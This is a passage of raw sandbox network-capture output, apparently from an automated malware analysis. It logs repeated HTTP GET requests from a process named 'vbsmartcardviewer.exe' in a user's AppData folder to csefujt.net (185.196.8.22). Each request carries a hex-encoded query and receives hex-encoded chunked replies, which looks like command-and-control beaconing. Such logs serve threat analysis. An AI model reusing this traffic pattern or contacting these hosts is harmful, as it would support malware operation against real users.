61 36 31 35 39 37 34 31 64 64 61 62 63 39 39 62 34 65 65 37 34 33 38 63 38 33 61 65 63 33 32 38 31 30 64 62 32 63 32 64 61 31 38 30 35 65 63 61 35 30 30 66 30 61 35 31 64 36 34 36 30 65 35 65 33 39 34 63 31 64 65 35 39 63 34 61 34 62 61 62 30 66 33 32 63 61 66 39 61 61 31 63 63 33 66 35 37 31 62 31 65 30 66 63 66 35 31 66 32 31 36 65 64 66 30 39 63 64 63 63 31 30 61 36 35 61 66 35 34 32 32 36 36 63 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 98067b68a8a3203a77b0418f55f67758cd846ff8dcef51d1fe9bd56eb0ac2a8cea9cce80ec71597bdd33421f609ba8cab4060e47e5db377f760b73056defcd20eca40cd7dbb19fa2d8924fa16a078c251b1e04eed517a5ded2c6f8b3a6687e113c4e89f9f3bcd649f13c6528e2da85fbaf75e22e471d1fd79b286ebcb4be53ed717365d4422e32f710866b2ea88e0872d58f85d7a20e02e5cfdffe78cf1387ebaec479b9afa7b260dbe60e59dcbb26ed4750c363367b255cfdba73a2ebac208bd1eb8a23ba6cdcf2e762e0cd935eb13e5d8bb194dd3380dc254c5f1619b27b4965ea9e3d4acde3c25a079b8eb1499a4b97959a087ff20a4fb9b841fec0ae35d85526dcab0cbfed84a6ca498f03baa6a880a36b523d33ad79d00cb5dbe3002144fcbd667423a54659bfb84292c604418c7dcb3111be3d0b9f7d5317578e73f8ecb0415419fabda054b5ad57e7f59334ee8d4cccbf9d4549f226a48f47e348228bdce957d9455c992221e0c7f9cf49ee0190fa62483dd0c7204d429cef49816723c7b9c3502e655436065874ac4bea6f931a0dbc11052862bcd5c578dbbc964d35025b36ae82e26b36f875d03cea7a2b06eaec212934ed3d4ca4bad10bc4bfcb3b1659eb02cab262b0e33c7897919e9a1c04c7beb303b2d0a1ed630ab4ea6159741ddabc99b4ee7438c83aec32810db2c2da1805eca500f0a51d6460e5e394c1de59c4a4bab0f32caf9aa1cc3f571b1e0fcf51f216edf09cdcc10a65af542266cb
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:31.638811111 CET1286INData Raw: 30 64 61 34 32 62 61 38 34 30 65 30 30 33 31 66 34 63 36 33 31 63 31 63 33 39 66 64 36 64 30 62 31 37 64 38 39 64 63 32 62 32 39 33 61 30 65 32 34 61 31 37 64 32 33 66 31 62 66 66 34 61 63 62 66 33 34 31 63 64 35 62 64 63 64 39 63 35 35 65 64 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0da42ba840e0031f4c631c1c39fd6d0b17d89dc2b293a0e24a17d23f1bff4acbf341cd5bdcd9c55edf2ba4c270eb84d46f7ba1c0fb293583af8b0d4c5fbc2abb3c554ac9ec4a851d3731748db75f2ee39ffff31afbfc507eb547899d331c1332f887c59a2fecaa339fb4fde9f85ca1e72826262b1160bd770c1
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:31.638848066 CET63INData Raw: 31 30 64 32 66 38 38 34 64 65 34 34 38 64 64 36 62 63 63 31 62 33 61 34 32 34 31 66 61 34 61 33 38 31 30 33 35 65 37 62 62 33 36 39 62 63 35 34 33 37 31 63 33 65 64 64 32 36 31 31 36 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 10d2f884de448dd6bcc1b3a4241fa4a381035e7bb369bc54371c3edd26116
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:31.638885975 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:34.282923937 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:34.532052994 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:34 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                9192.168.2.649745185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:34.863394976 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:35.104325056 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:35 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 65 65 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 62 64 32 65 39 31 65 31 38 66 35 61 30 35 37 66 34 30 31 64 35 66 66 38 31 65 65 39 34 38 37 34 36 38 39 34 39 63 64 65 36 64 63 32 61 33 31 61 31 35 32 66 39 64 36 63 65 31 61 32 30 65 39 37 63 35 64 62 33 37 34 66 65 36 66 62 37 33 32 35 34 63 39 65 30 64 31 30 63 63 37 34 39 63 38 37 64 62 30 31 62 66 36 33 36 39 34 32 34 65 35 31 37 62 38 36 30 63 63 34 64 62 61 65 30 34 37 65 37 35 39 37 66 34 33 65 37 32 64 36 33 38 62 33 61 36 34 38 65 65 31 31 30 63 33 65 66 38 62 39 38 33 62 63 37 36 63 39 36 31 36 64 33 35 36 38 61 33 34 62 37 35 39 62 61 66 37 35 65 32 30 65 63 36 35 64 36 66 63 37 33 62 61 38 66 65 66 64 65 34 63 65 33 32 30 63 38 31 36 33 63 34 33 35 62 32 31 65 32 33 62 37 31 30 30 36 63 62 63 65 63 38 64 66 35 38 33 33 33 35 38 66 38 35 65 37 38 33 66 66 63 32 62 35 62 66 64 66 66 65 37 38 63 66 31 33 38 37 65 62 61 65 63 34 37 39 62 39 61 66 33 37 65 33 39 31 31 62 39 36 61 65 35 39 64 63 62 62 32 36 65 64 38 36 65 31 62 32 61 33 30 36 33 62 32 35 31 63 66 63 33 61 66 33 62 32 38 62 30 63 61 30 65 62 38 30 62 62 38 61 36 33 36 61 36 63 32 63 64 32 65 37 35 32 66 30 38 63 64 33 32 65 66 31 36 65 34 64 32 62 65 30 37 34 34 64 33 33 36 31 36 64 61 35 37 64 62 66 32 37 64 39 63 32 61 62 32 38 38 35 66 61 37 65 37 64 61 61 62 63 30 33 62 32 38 62 62 37 39 61 33 65 63 30 66 38 35 61 31 62 39 37 32 34 34 61 31 38 30 66 36 32 62 61 66 66 65 38 35 38 36 31 34 65 63 31 32 65 61 34 34 38 31 34 64 36 35 64 31 62 34 63 37 66 64 63 36 34 64 36 64 61 32 39 39 65 65 33 31 61 37 37 63 39 37 30 64 33 36 61 33 33 63 64 32 33 39 63 33 39 37 30 35 63 31 35 65 62 35 33 31 30 66 31 35 35 30 64 34 64 36 36 63 35 64 32 35 35 34 36 32 39 62 66 64 38 64 32 30 32 66 36 30 34 66 31 62 63 61 64 63 62 36 31 39 30 64 66 61 64 35 61 36 65 66 64 62 33 65 37 64 37 62 65 37 33 66 38 65 63 33 30 33 30 39 35 65 39 63 61 33 64 61 30 31 34 65 34 33 63 61 37 63 37 36 35 61 33 39 34 66 65 33 64 31 64 39 63 35 66 35 64 34 35 32 39 62 33 35 37 32 34 63 66 65 37 35 32 61 38 36 32 31 62 63 63 65 39 33 37 66 38 31 35 64 63 35 39 32 32 32 31 64 30 64 37 66 39 62 66 32 38 30 65 66 31 62 30 35 61 35 32 66 38 61 64 33 31 34 37 36 31 64 64 63 33 37 63 35 65 61 39 30 30 39 37 37 32 62 37 35 39 66 33 66 30 31 65 64 35 63 34 64 37 39 36 65 39 38 34 64 64 39 62 65 62 64 65 36 33 64 61 31 63 66 63 33 31 30 35 37 38 37 32 63 63 38 34 32 35 36 38 36 62 61 64 65 37 62 64 33 35 31 33 65 61 39 36 61 65 33 32 34 33 38 62 31 36 30 38 30 35 65 31 63 63 61 61 34 61 34 61 35 36 65 61 65 63 33 31 32 39 31 34 39 63 38 64 38 63 32 35 35 61 63 31 39 62 34 34 39 66 30 61 64 62 30 36 65 39 61 61 36 32 62 62 34 32 64 33 30 30 66 32 39 63 34 38 30 36 36 31 35 65 38 61 62 63 65 34 64 37 32 65 33 32 66 33 30 32 32 30 61 31 63 64 66 33 30 61 62 34 34 61 32 30 31 39 33 34 31 64 62 61 61 63 39 39 36 34 62 66 39 34 61 38 38 38 33 62 38 64 65 32 39 30 65 64 33 33 33 32 36 61 37 38 31 34 30 63 30 35 39 30 64 30 33 34 61 64 32 34 36 31 62 35 36 33 66 35 35 30 31 65 35 39 61 35 32 34 39 62 34 30 62 33 61 63 63 66 38 61 61 31 61 63 62 65 62 37 38 62 39 65 30 66 63 66 37 31 64 33 65 37 31 64 37 30 36 64 39 63 65 31 64 61 63 35 62 66 65 34 62 32 33 37 39 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 8ee67b69c953804b26b565fe95b321bd19a55f78bd2e91e18f5a057f401d5ff81ee9487468949cde6dc2a31a152f9d6ce1a20e97c5db374fe6fb73254c9e0d10cc749c87db01bf6369424e517b860cc4dbae047e7597f43e72d638b3a648ee110c3ef8b983bc76c9616d3568a34b759baf75e20ec65d6fc73ba8fefde4ce320c8163c435b21e23b71006cbcec8df5833358f85e783ffc2b5bfdffe78cf1387ebaec479b9af37e3911b96ae59dcbb26ed86e1b2a3063b251cfc3af3b28b0ca0eb80bb8a636a6c2cd2e752f08cd32ef16e4d2be0744d33616da57dbf27d9c2ab2885fa7e7daabc03b28bb79a3ec0f85a1b97244a180f62baffe858614ec12ea44814d65d1b4c7fdc64d6da299ee31a77c970d36a33cd239c39705c15eb5310f1550d4d66c5d2554629bfd8d202f604f1bcadcb6190dfad5a6efdb3e7d7be73f8ec303095e9ca3da014e43ca7c765a394fe3d1d9c5f5d4529b35724cfe752a8621bcce937f815dc592221d0d7f9bf280ef1b05a52f8ad314761ddc37c5ea9009772b759f3f01ed5c4d796e984dd9bebde63da1cfc31057872cc8425686bade7bd3513ea96ae32438b160805e1ccaa4a4a56eaec3129149c8d8c255ac19b449f0adb06e9aa62bb42d300f29c4806615e8abce4d72e32f30220a1cdf30ab44a2019341dbaac9964bf94a8883b8de290ed33326a78140c0590d034ad2461b563f5501e59a5249b40b3accf8aa1acbeb78b9e0fcf71d3e71d706d9ce1dac5bfe4b2379b
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:35.104355097 CET1203INData Raw: 33 64 61 34 32 62 61 38 65 31 30 30 32 32 37 66 30 63 39 33 33 64 61 63 37 39 61 64 37 64 61 62 30 36 33 38 61 64 36 33 32 32 30 32 64 30 64 33 63 62 63 37 31 32 38 65 65 62 38 66 30 61 36 62 31 33 35 31 64 64 38 61 32 63 65 39 61 34 38 66 31 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3da42ba8e100227f0c933dac79ad7dab0638ad632202d0d3cbc7128eeb8f0a6b1351dd8a2ce9a48f1f0bd51380bb55940f0b01f04b590433fe0a6d9dae7c5a8a7c15cab9fc6a957c6771254c775ede424f9e639afbccf0dee55669add27dd302f887f50a4eacba23bfa4adb818cc2006e806875ad1400dd6fc0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:35.104371071 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                10192.168.2.649747185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:35.653923988 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:35.896358967 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:35 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                11192.168.2.649748185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:36.498306036 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:36.739445925 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:36 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                12192.168.2.649749185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:37.979057074 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:38.222875118 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:38 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:38.336050034 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:38.573187113 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:38 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                13192.168.2.649750185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:38.910409927 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:39.152757883 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:39 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                14192.168.2.649751185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:39.485261917 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:39.722048998 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:39 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:39.839637041 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:40.076411963 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:39 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                15192.168.2.649752185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:40.450141907 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:40.690221071 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:40 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                16192.168.2.649753185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:41.029175043 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:41.275964975 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:41 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                17192.168.2.649754185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:41.617321968 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:41.854145050 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:41 GMT
